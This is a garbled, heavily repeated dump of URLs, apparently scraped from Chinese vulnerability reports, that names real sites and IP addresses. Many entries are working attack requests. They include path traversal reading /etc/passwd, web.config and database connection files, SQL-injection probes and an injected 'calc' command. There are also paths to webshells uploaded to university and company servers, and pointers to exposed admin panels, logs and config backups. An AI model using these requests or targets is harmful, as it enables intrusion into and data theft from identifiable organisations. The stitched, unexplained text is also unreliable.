http://www.hzydxx.com/inc/downfj.asp?path=%2Fmedia%2Fdown%2FWeb%2Fsource%2FOther%2F../../../../../inc/conn.asp&filename=conn.asp http://pacz.pa18.com/pacz_core/do/oea/loadNasFile?fileType=png&folder=qrCode.productInfo.nas&fileName=../../../../../../../../../../../../../../etc/passwd http://222.180.195.50/login.do http://www.app365.com/ http://www.app365.com/common/customer.jhtml http://cwy.cyberway.net.cn/ http://cp.cyberway.net.cn/ http://pv.semi.org.cn/ads/adsclick.action http://e.cyberway.net.cn/login.action http://cloud.suning.com/cloud-web/versionUpdateByType.htm?platform=IOS_HD http://cloud.suning.com/cloud-web/versionUpdateByType http://sqlmap.org http://www.hfxzzx.gov.cn/admin.action http://www.frontop.cn/lywm/ http://edu.chanjet.com/new/index.php?user-app-login https://github.com/denghualiang/educhanjet http://www.app365.com/ http://www.app365.com/common/customer.jhtml http://www.hzzoy.com/ http://www.caa123.org.cn/frontnoOrderAction.do?method=frontOrderDetail&orderId=1160000 http://www.caa123.org.cn/frontnoOrderAction.do?method=frontOrderDetail&orderId=1240600 http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx 
http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://www.o2bra.com.cn/api/user_addresses?user_id=58936 http://www.o2bra.com.cn/api/follows/my?user_id=1 http://www.o2bra.com.cn/api/user_contacts?user_id=58936 http://www.woh.com.cn/bbs/user/userDetails.jsp?userName= http://www.woh.com.cn/bbs/user/userDetails.jsp?userName= http://sqlmap.org http://114.251.197.194/ http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://www.uniscope.com/ http://www.uniscope.com/admin.php zlgc.sicnu.edu.cn/master/login.aspx http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx 
http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://ds.cpf.com.cn/NASApp/cpf/distribute/index.jsp http://ds.cpf.com.cn/NASApp/cpf/DownLoadServlet?disDownDir=../../../../../etc/passwd lp:/bin/false invscout:/usr/bin/ksh user:/usr/sbin/snapp:/usr/sbin/snappd ipsec:/usr/bin/ksh user:/var/spool/uucppublic:/usr/sbin/uucp/uucico pconsole:/usr/bin/ksh esa:/usr/bin/ksh empty:/usr/bin/ksh mont:/usr/bin/ksh rt:/usr/bin/ksh www.eqyn.com/manage/content/docmanage/download.jsp?filePath=../../../../../../../etc/passwd www.eqyn.com/manage/content/docmanage/download.jsp?filePath=../../../../../../ http://www.chinajob.gov.cn/ http://www.chinajob.gov.cn/job12333/ http://www.chinajob.gov.cn/job12333/WebPage.Admin/Login.aspx https://kyfw.12306.cn/otn/passcodeNew/getPassCodeNew?module=regist&rand=sjrand&0.54322674895787 https://kyfw.12306.cn/otn/passcodeNew/getPassCodeNew?module=other&rand=sjrand&0.36124213441517 http://sphy.org.cn/ http://its.bit.edu.cn/)存在命令执行漏洞,可远程获取服务器管理权限。 http://staff.fesco.com.cn/ http://staff.fesco.com.cn/benefit/goods.aspx?hid=10141 http://staff.fesco.com.cn/admin/login.aspx http://**.**.**/ http://hikbbs.hikvision.com/forum.php,站点是海康威视的经销商论坛,直接传图就可以getshell。 http://96361.xyhdz.gov.cn/xinwen.php?id=6 http://96361.xyhdz.gov.cn/xinwen.php?id=6 http://96361.xyhdz.gov.cn/ http://96361.xyhdz.gov.cn/file_down.php?file=./upload/file/20150324/5511184b6d826.php&name=1.php http://96361.xyhdz.gov.cn/upload/file/20150324/5511184b6d826.php http://si.cnc.cn/ http://si.cnc.cn:80/ucsisite/search.jsp http://si.cnc.cn:80//ucsisite/search.jsp ftp://58.61.71.24 http://xile.xunbao178.com inurl:/qsjsrzj/logindw.jsp http://www.lcwscgs.com/qsjsrzj/logindw.do www.lcwscgs.com http://zhanglife.ustb.edu.cn/)存在命令执行漏洞,可远程控制服务器。 http://ticket.gdcd.gov.cn/Schedule.aspx http://shop.fesco.com.cn/phpmyadmin/index.php 
http://220.178.13.7:8080/news/newsread.aspx?classname=地方交流&classid=hjz_dfxx&articleid=m5o1qc2015129145821 http://220.178.13.7:8080/news/newsread.aspx?classname=地方交流&classid=hjz_dfxx&articleid=m5o1qc2015129145821 http://sns.neusoft.com/ http://estore.wacom.com.cn http://ycxl.net/index.php?m=Article&a=index&id=22 http://www.ycgjgs.com/ http://www.ycgjgs.com//news.php?id=475 http://www.ycgjgs.com//qynews.php?type=8 http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://cg.lashou.com/new_index.php?class=FindPasswd&old=0 http://www.gzfb.gov.cn/fwdt/SingleChild/DWSH/Login.aspx http://www.gzfb.gov.cn/fwdt/SingleChild/DWSH/Login2.aspx http://www.gzfb.gov.cn/fwdt/SingleChild/DWSH/Login.aspx http://www.gzfb.gov.cn/fwdt/SingleChild/DWSH/Login2.aspx http://im.mgyun.com/ http://mp.weixin.qq.com/wiki/3/17e6919a39c1c53555185907acf70093.html http://m.weigouyi.com/130124143905063115.html http://www.weigouyi.com/Case/ http://www.haohandata.com.cn/job/job.php?class=9 http://www.haohandata.com.cn/job/job.php?class=9 http://sqlmap.org http://www.gxdzhj.gov.cn/showarticle.php?nid=438 http://222.66.163.38/hudson/job/crm/ws/ http://222.66.163.38/dongfangcrm-web/login.html;jsessionid=60E4F8156C2C165D7E1D153C4AA295A7 http://www.ahjjjc.gov.cn http://www.betcity.com.tw/phpMyAdmin/ https://github.com/xiaofeng993229/reportv-2.0/blob/c966b98ee97b85154202d500d158ddfc5f0bbffe/daemons/tryeatReport.php https://207.97.148.78/+CSCOE+/logon.html http://drops.wooyun.org/papers/3451 http://shixi.189.cn/shixibao/ucenter/ 
http://bbs.10yan.com/config/config_global.php.bak http://www.chinanpohr.com/admin/ http://app.wanda.cn/APPREP/film http://221.232.128.166:8080 http://dc.99.com http://static.dc.99.com/App_Script/XT/userlogin.js http://dc.99.com/YB/Paper/Answer.aspx?paperid=2472 http://dc.99.com//Attach/【魔域口袋版】羊年贺岁版礼包预约问卷201502121126212795.zip http://cs.njfu.edu.cn/yzbywlw/login.action http://www.wanchezhijia.com/登陆处 www.wanchezhijia.com http://www.maimaimai.com.cn/login.html http://www.dxb.sdu.edu.cn/list_art.php?sortid=6&id=73 http://www.culture.sdu.edu.cn/surrounding_t.php?er_id=37 http://www.wqk8.com http://www.bfyhyc.com/yjkxxx.asp?id=1&psid=1 http://www.bflad.com/yjkxxx.asp?id=1&psid=1 http://www.luoyangxiaofang.com/yjkxxx.asp?id=1&psid=1 http://www.lycbxf.com/yjkxxx.asp?id=1&psid=1 http://dzj777.com/yjkxxx.asp?id=1&psid=1 http://tjchangguan.com/yjkxxx.asp?id=1&psid=1 http://www.lydahua.com.cn/yjkxxx.asp?id=1&psid=1 http://www.13937942506.com/yjkxxx.asp?id=1&psid=1 http://lyjzdz.com/yjkxxx.asp?id=1&psid=1 http://www.liangxianjun.com/yjkxxx.asp?id=1&psid=1 http://www.qqldw.cn/yjkxxx.asp?id=1&psid=1 http://www.liangxianjun.com/yjkxxx.asp?id=1&psid=1 http://www.healthtc.com/media_list.php?kid=3 http://180.168.124.132/toms/ http://www.czfc.org.cn/txxw_contact.asp?ProductID=2198 www.qhca.gov.cn:80/QHCMS/getfileservlet?path=../../../../../../../../../../../.././windows/win.ini%00.html http://www.nongyou.com.cn/ http://222.135.127.190:7000/gov/SearchInfoSum.aspx?keyword= http://221.2.171.59:8000/gov/SearchInfoSum.aspx?keyword= http://222.135.109.70:8100/gov/SearchInfoSum.aspx?keyword= http://61.133.119.187:8089/gov/SearchInfoSum.aspx?keyword= http://221.2.156.181:8100//gov/SearchInfoSum.aspx?keyword= http://221.2.149.47:8100/gov/SearchInfoSum.aspx?keyword= http://222.135.127.190:7000/gov/SearchInfoSum.aspx?keyword= https://ticket.wandaperformance.com/user/find http://zxks.nm.zsks.cn/zkweb/zk_kkzykc.jsp?zydm=020106 
http://www.hicar.com.tw/Index.asp?CID=16&CID2=%EF%BF%BDn%EF%BF%BDX%EF%BF%BD%EF%BF%BD_B http://117.79.80.15:8081/index.html http://**.**.**/login.aspx_ http://36.48.70.34:8086/cczfbz/jsp/system/logindw.jsp http://www.kmtaizhu.com/news_show.php?id=1 http://www.yishengcao.com/thi.php?id=1 http://www.yn-led.com/thi.php?id=4 http://www.mufoedu.com/thi.php?id=1 http://www.kmliyade.com/newsxx.aspx?id=464 https://github.com/morgan0329/platform/ aobo.tcl.com/leftabout.asp?id=37 http://www.msaonline.gov.cn/xx_SJshow.aspx?id=2015/3/9/P2015392920269b384a5fb41.html http://oa.hunantv.com/seeyon/ http://www.999lm.com/phpmadmin/pmd_relationsma.php www.bbready.com http://www.bbready.com http://202.115.138.250/ http://www.wenjuan.com/s/u6BzYz/,其中最后一个问题,对输入的内容没有做过滤 com:5658/esfcrmsite/model/SysManage/Document/DownLoadDoc.aspx?DocUrl=../web.config http://www.fuji.com.tw, http://used.dangdang.com/ajax_proxy.php?action=research_submit&content=&email=&ques_type=3&request_url=ajax_proxy.php&sender_url=http%3A//used.dangdang.com/survey.php&type=660 http://tuan.bitauto.com/brand?spell= http://bbs.a9vg.com/forum.php http://f16.7daysinn.cn:8080/log/serverLog http://f16.7daysinn.cn:8080/log/serverLog/localhost_access_log.2015-03-22.txt http://f16.7daysinn.cn:8080/log/appLog/app-info.log www.hnagroup.com http://www.hnagroup.com/index.php/lifestyle/?category=&order=%5c http://www.hnagroup.com/takelovehome/ajax?page=%5c&perpage=10&type=recent http://www.hnagroup.com/welcome2015/comment_ajax/get?page=%5c&perpage=10 http://www.hnagroup.com//industry/?submenu=aviation%26n946669%3dv962150 index.php/industry/?submenu=aviation%26n964489%3dv983194 index.php/industry/detail?id=171&submenu=aviation%26n917435%3dv904711 index.php/lifestyle/?category=1%26n980832%3dv977422 http://www.cloud511.com/case http://www.zjrrt.com/ http://www.ewj2009.com/ http://www.nbzyyy.com/ http://test.hzyibai.com/ http://www.zjtydyf.com/ http://leisuredak.com/ http://www.yizheng.cc/ http://www.edutech.com.cn 
http://*/sysImageUploadAction.do?method=uploadimage&savepath=user&pathtype=D&sketch=vod http://www.edutech.com.cn/sysImageUploadAction.do?method=uploadimage&savepath=user&pathtype=D&sketch=vod http://www.edutech.com.cn/cms/uploaddir/product/4d697d9967ee9354a2941ffcb0351636.jpg http://www.edutech.com.cn/cms/uploaddir/*savepath的值/返回的值 http://www.edutech.com.cn/cms/uploaddir/user/15c030fe752c02accd6b99de3e74c564.jpg http://fe.bnu.edu.cn/sysImageUploadAction.do?method=uploadimage&savepath=user&pathtype=D&sketch=vod http://fe.bnu.edu.cn/upload_dir/1/news/201503/c5c4ab8718bf4e770d1e6cae35546b41.jsp http://www.wkmk.cn/sysImageUploadAction.do?method=uploadimage&savepath=user&pathtype=D&sketch=vod http://wlkc.jtdx.com.cn//sysImageUploadAction.do?method=uploadimage&savepath=user&pathtype=D&sketch=vod http://wlkc.jtdx.com.cn/upload_dir/user/2015-03-25/668763c8d469d704b2e1d9926061ae15.jsp http://cc.yundasys.com:8087/callcenter_new/popedom/userExit.action https://github.com/tutucute567/smart_scheduler/blob/2049408996b98e08fdc7b0c0cb46c06e843e8a8f/code/servers/rule_engine/code/script/mail.py rtsp://192.168.1.1/ http://shop.zhe800.com/users/addresses http://shop.zhe800.com:80/users/addresses http://www.wholeton.com/Anli.php https://test.bescar.com https://angelic.com.cn/ http://222.223.56.116 https://222.92.15.100 http://111.206.133.4/ http://mail.hualiu.cc/ http://agent.mchina.cn/front/preregist/out_key_query_submit_new.action http://222.85.90.197:8080/CncConference/control/index.jsp http://www.apabi.cn POST:key=1 http://202.119.210.5/dlib/bbs/bbs_search.asp?lang=gb http://210.37.2.181/dlib/bbs/bbs_search.asp?lang=gb http://210.34.4.3/dlib/bbs/bbs_search.asp?lang=gb http://202.117.24.8/dlib/bbs/bbs_search.asp?lang=gb http://apabi.lib.njit.edu.cn/bbs/bbs_search.asp?lang=gb http://www.zoomeye.org/search?q=Etag:%20%221397468047:a2bb%22%20port:80%20country:China&p=3&t=host http://58.132.89.157/ http://58.132.89.156/ http://58.132.89.158/ http://113.200.242.130/ 
http://120.37.120.228/ http://61.177.142.251/ http://www.ahgd.gov.cn/bmxx.php?bid=1 http://www.ahgd.gov.cn/bmxx.php?bid=1 http://www.ahgd.gov.cn/bmxx.php?bid=1 http://www.htgq.gov.cn/news/show.asp?id=599 http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://219.239.42.152/webfig/#Tools:Bandwidth_Test http://www.ycjsy.com/ http://www.ycjsy.com/mxzc.asp?userid=87 demo:http://show.wecrm.com/xt/main demo:http://show.wecrm.com/xt/main demo:http://show.wecrm.com/xt/main http://show.wecrm.com/xt/CrmMainFrame/MyWorkPartial/ demo:http://show.wecrm.com/xt/main http://show.wecrm.com/xt/main/SaveModuleCfg/ http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://www.wholeton.com/Anli.php https://test.bescar.com https://angelic.com.cn/ http://222.223.56.116 https://222.92.15.100 http://111.206.133.4/ http://mail.hualiu.cc/ http://123.138.37.155:8090/jnmis2/xt/login.action存在st2漏洞 http://61.138.121.123:8080/alsmgljpt/xt/login.action http://suggestion.baidu.com/su;/1.bat?wd=&cb=calc||&sid=1440_2031_1945_1788&t=1362056239875 
http://df.ceair.com/BGGTracer/Login.aspx http://www.jinritemai.com/address/delete http://doogua.dangdang.com/api.php?/=book/search http://career.fesco.com.cn/register http://www.wholeton.com/Anli.php https://test.bescar.com https://angelic.com.cn/ http://222.223.56.116 https://222.92.15.100 http://111.206.133.4/ http://mail.hualiu.cc/ http://**.**.**/free_portalLoginRedirect.wlan http://dm.10086.cn/weixin/index.php?s=/addon/Biaobai/Index/bb/uid/126654%27%20and%20%272%27=%272/ http://dm.10086.cn/weixin/index.php?s=/addon/Biaobai/Index/bb/uid/126654%27%20and%20%272%27=%271/ http://www.51yund.com/download.html http://yun.zjer.cn/index.php?r=studio/affiche/details&id=56 http://www.sspplan.com/web/newsAction!queryNewsDetail.action demo:http://show.wecrm.com/xt/main inurl:multi_detail.jsp?pk_corp= http://114.242.137.125/dap/dtalent/drs/default/multi_detail.jsp?pk_corp=10102%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20&channel=3&innercode=001 http://123.124.148.248:8888/dap/dtalent/drs/default/multi_detail.jsp?pk_corp=11410301115121350280&channel=3&innercode=001 http://zhaopin.bjcyh.com/dap/dtalent/drs/default/multi_detail.jsp?pk_corp=11411181908130600017&channel=3&innercode=001 http://211.103.167.51/dtalent/dtalent/drs/default/multi_detail.jsp?pk_corp=11401201043552010286&channel=4&innercode=002 http://hr.xwhosp.com.cn/dtalent/dtalent/drs/default/multi_detail.jsp?pk_corp=11310291516308100967&channel=4&innercode=001 http://edu.ekwing.com/doc/researchlist?album_id=1&class_id=1&order=1 http://www.ekwing.com/doc/researchlist?album_id=1&class_id=1&order=1 http://chinarejt.21tb.com/login/login.logout.do http://www.kiford.com/ www.kiford.com http://www.kiford.com http://www.trainingmag.com.cn/course/Course_Search.aspx?Action=Search&Type=Cor550777195472 www.taiwan.cn,简称台湾网)是国务院台办管理的国家重点新闻网站,是涉台服务的综合门户网站,是两岸交流合作的权威平台。 http://apps.chinataiwan.org http://www.oppo.com/resource/UA-PROF/ONEPLUSA0001.xml http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx 
http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx www.szgt.gov.cn http://is.gd/VFuwkm www.hcbtv.com http://115.29.16.20:6000/admin http://t.cn/RZgOxiR http://blog.zhulong.com/u10104299/blogdetail4781721.html http://cms.moyi365.com/doc/researchlist?album_id=1&class_id=1&order=1 http://cms.ekwing.com/doc/researchlist?album_id=1&class_id=1&order=1 http://www.nongyou.com.cn/ http://61.133.119.187:8091/newsymItemManage/Item6.aspx?id=1 http://222.135.76.147:8200/newsymItemManage/Item6.aspx?id=1 http://222.135.127.190:7200/newsymItemManage/Item6.aspx?id=1 http://221.2.149.47:8200/newsymItemManage/Item6.aspx?id=1 http://218.59.205.41:8053/newsymItemManage/Item6.aspx?id=1 http://jwh.tanljgzx.gov.cn/newsymItemManage/Item6.aspx?id=1 http://221.2.171.59:8200/newsymItemManage/Item6.aspx?id=1 http://218.56.159.98:8001/newsymItemManage/Item6.aspx?id=1 http://123.134.189.60:8016/newsymItemManage/Item6.aspx?id=1 http://medapp.ranknowcn.com/log.txt http://yy.ranknowcn.com/m/login.php http://www.nongyou.com.cn/ http://61.133.119.187:8091/newsymItemManage/Item5.aspx?id=1 http://222.135.76.147:8200/newsymItemManage/Item5.aspx?id=1 http://222.135.127.190:7200/newsymItemManage/Item5.aspx?id=1 http://221.2.149.47:8200/newsymItemManage/Item5.aspx?id=1 http://218.59.205.41:8053/newsymItemManage/Item5.aspx?id=1 http://jwh.tanljgzx.gov.cn/newsymItemManage/Item5.aspx?id=1 http://221.2.171.59:8200/newsymItemManage/Item5.aspx?id=1 http://218.56.159.98:8001/newsymItemManage/Item5.aspx?id=1 http://123.134.189.60:8016/newsymItemManage/Item5.aspx?id=1 http://www.nongyou.com.cn/ 
http://61.133.119.187:8091/newsymItemManage/Item4.aspx?id=1 http://222.135.76.147:8200/newsymItemManage/Item4.aspx?id=1 http://222.135.127.190:7200/newsymItemManage/Item4.aspx?id=1 http://221.2.149.47:8200/newsymItemManage/Item4.aspx?id=1 http://218.59.205.41:8053/newsymItemManage/Item4.aspx?id=1 http://jwh.tanljgzx.gov.cn/newsymItemManage/Item4.aspx?id=1 http://221.2.171.59:8200/newsymItemManage/Item4.aspx?id=1 http://218.56.159.98:8001/newsymItemManage/Item4.aspx?id=1 http://123.134.189.60:8016/newsymItemManage/Item4.aspx?id=1 http://210.22.113.182:9090/dashboard.action http://211.81.174.133:81/dlib/List1.asp?lang=gb&act=CategoryBrowse&DocGroupID=2&CategoryTypeID=1&BrowseID=12&BrowseName=%B4%AB%BC%C7%BB%D8%D2%E4%C2%BC http://apabi.library.nenu.edu.cn/dlib/List1.asp?lang=gb&act=CategoryBrowse&DocGroupID=2&CategoryTypeID=1&BrowseID=10&BrowseName=%CE%C4%D1%A7 http://dlib.fxlib.cn:8282/dlib/List1.asp?lang=gb&act=CategoryBrowse&DocGroupID=2&CategoryTypeID=1&BrowseID=5&BrowseName=%D5%FE%D6%CE http://61.167.120.67:8083/DLib/List1.asp?lang=gb&act=CategoryBrowse&DocGroupID=2&CategoryTypeID=1&BrowseID=1&BrowseName=%BC%C6%CB%E3%BB%FA%CD%F8%C2%E7 http://dzts.nsjy.com/dlib/List1.asp?lang=gb&act=CategoryBrowse&DocGroupID=10&CategoryTypeID=1&BrowseID=1&BrowseName=%BC%C6%CB%E3%BB%FA%CD%F8%C2%E7 http://www.nongyou.com.cn/ http://61.133.119.187:8091/newsymItemManage/Item1.aspx?id=1 http://222.135.76.147:8200/newsymItemManage/Item1.aspx?id=1 http://222.135.127.190:7200/newsymItemManage/Item1.aspx?id=1 http://221.2.149.47:8200/newsymItemManage/Item1.aspx?id=1 http://218.59.205.41:8053/newsymItemManage/Item1.aspx?id=1 http://jwh.tanljgzx.gov.cn/newsymItemManage/Item1.aspx?id=1 http://221.2.171.59:8200/newsymItemManage/Item1.aspx?id=1 http://218.56.159.98:8001/newsymItemManage/Item1.aspx?id=1 http://123.134.189.60:8016/newsymItemManage/Item1.aspx?id=1 http://www.nongyou.com.cn/ http://61.133.119.187:8091/newsymItemManage/Item3.aspx?id=1 
http://222.135.76.147:8200/newsymItemManage/Item3.aspx?id=1 http://222.135.127.190:7200/newsymItemManage/Item3.aspx?id=1 http://221.2.149.47:8200/newsymItemManage/Item3.aspx?id=1 http://218.59.205.41:8053/newsymItemManage/Item3.aspx?id=1 http://jwh.tanljgzx.gov.cn/newsymItemManage/Item3.aspx?id=1 http://221.2.171.59:8200/newsymItemManage/Item3.aspx?id=1 http://218.56.159.98:8001/newsymItemManage/Item3.aspx?id=1 http://123.134.189.60:8016/newsymItemManage/Item3.aspx?id=1 http://www.nongyou.com.cn/ http://61.133.119.187:8091/newsymItemManage/Item2.aspx?id=1 http://222.135.76.147:8200/newsymItemManage/Item2.aspx?id=1 http://222.135.127.190:7200/newsymItemManage/Item2.aspx?id=1 http://221.2.149.47:8200/newsymItemManage/Item2.aspx?id=1 http://218.59.205.41:8053/newsymItemManage/Item2.aspx?id=1 http://jwh.tanljgzx.gov.cn/newsymItemManage/Item2.aspx?id=1 http://221.2.171.59:8200/newsymItemManage/Item2.aspx?id=1 http://218.56.159.98:8001/newsymItemManage/Item2.aspx?id=1 http://123.134.189.60:8016/newsymItemManage/Item2.aspx?id=1 http://www.hzzoy.com/ http://www.bllib.net.cn:8080/lcd/lcd_Search.html?Keyword= http://www.msit21.com//lcd/lcd_Search.html?Keyword= http://218.2.112.243:8080/lcd/lcd_Search.html?Keyword= http://218.108.51.86/lcd/lcd_Search.html?Keyword= http://122.225.192.136/lcd/lcd_Search.html?Keyword= http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://teda.nankai.edu.cn/ScanWebshell.asp?act=scan http://www.cloud511.com/case http://www.zjrrt.com/ http://www.ewj2009.com/ 
http://www.nbzyyy.com/ http://test.hzyibai.com/ http://www.zjtydyf.com/ http://leisuredak.com/ http://www.yizheng.cc/ http://code.taobao.org/p/lfhzshop/src/trunk/data/config.php http://www.lszhen.com/ http://code.taobao.org/p/shiji_be/src/config/config.php http://www.msit21.com/board/board_list.html?ListID=1 http://218.2.112.243:8080/board/board_list.html?ListID=1 http://202.197.107.11:86/board/board_list.html?ListID=3 http://mail.tdsy.org/board/board_list.html?ListID=1 http://218.108.27.9/board/board_list.html?ListID=1 www.21cake.com http://www.bbready.com/cart-checkout.html http://www.jiathis.com/code/swf/m.swf appName:String mySo:SharedObject http://zzb.hrbeu.edu.cn/article/list.asp?classid=8 http://dpd.hrbeu.edu.cn/index.php?action=list&classid=4&cid=63 http://hospital.hrbeu.edu.cn/info/showinfo.asp?infoid=2147 http://chengeng.hrbeu.edu.cn/showarticle.php?articleid=531 http://qihang2010.hrbeu.edu.cn/yglt/ShowArticle.asp?ArticleID=14428 http://qihang.hrbeu.edu.cn/showdown.php?id=135 http://www.wooyun.org/bugs/wooyun-2010-0103731/trace/871e09c984979a433fdb3724361d4ba9 http://vip.51wan.com http://acccen.xmu.edu.cn/news/m-list.asp?nType=2 http://jmzx.xmedu.cn:9999/anmai/Edis/home_school/sudjectdiscussmanage.aspx?cz=del&number=1 http://218.78.241.80/anmai/Edis/home_school/sudjectdiscussmanage.aspx?cz=del&number=1 http://www.xwgjzx.com:8888/anmai/Edis/home_school/sudjectdiscussmanage.aspx?cz=del&number=1 http://szxx.pudong-edu.sh.cn/anmai/Edis/home_school/sudjectdiscussmanage.aspx?cz=del&number=1 http://www.gxbyzx.cn:88/anmai/Edis/home_school/sudjectdiscussmanage.aspx?cz=del&number=1 demo:http://show.wecrm.com/xt/main http://jmzx.xmedu.cn:9999/anmai/Elective/ClassInfo/CallOverDown_2.aspx?itemid=1 http://218.78.241.80/anmai/Elective/ClassInfo/CallOverDown_2.aspx?itemid=1 http://szxx.pudong-edu.sh.cn/anmai/Elective/ClassInfo/CallOverDown_2.aspx?itemid=1 http://www.gxbyzx.cn:88/anmai/Elective/ClassInfo/CallOverDown_2.aspx?itemid=1 
http://www.xwgjzx.com:8888/anmai/Elective/ClassInfo/CallOverDown_2.aspx?itemid=1 http://www.zc511.com/ http://www.smdyf.cn/getNewsList.do?newsType=123 http://www.jylbx.com/getNewsList.do?newsType=123 http://www.46buy.com/fyct/getNewsList.do?newsType=123 http://www.jkzx1818.com/getNewsList.do?newsType=3 http://test.360lbx.com/getNewsList.do?newsType=123 http://www.js96296.com/dzyyt_wt/cnnet/info/getProductFloor.jspx http://www.js96296.com/dzyyt_wt/cnnet/info/getProductInfo.jspx?ipage=10&prodChannel=0&prodsearchType=&sortType=&sortWay=asc http://www.js96296.com/dzyyt_wt/cnnet/info/remoteControll.jspx?boardId=-1&titleId=10 http://www.js96296.com/dzyyt_wt/cnnet/info/toBusinessmanager.jspx?boardId=5&titleId=-1 http://www.js96296.com/dzyyt_wt/cnnet/in http://sqlmap.org http://220.180.202.150:8008/ http://www.hzyibai.com/showProductMessage.do?productId=248407&curPage= http://www.smdyf.cn/showProductMessage.do?productId=146576&curPage= http://www.ewj2009.com/showProductMessage.do?productId=247012&curPage= http://test.360lbx.com/showProductMessage.do?productId=250199&curPage= http://www.gxjjls.com/showProductMessage.do?productId=250507&curPage= http://computer.ytu.edu.cn/newssys/list.php?cat=0 http://mhz.pw/game/jiathis/jiathis.html http://findbrazil.go.163.com/ http://mjob.12582.cn/ 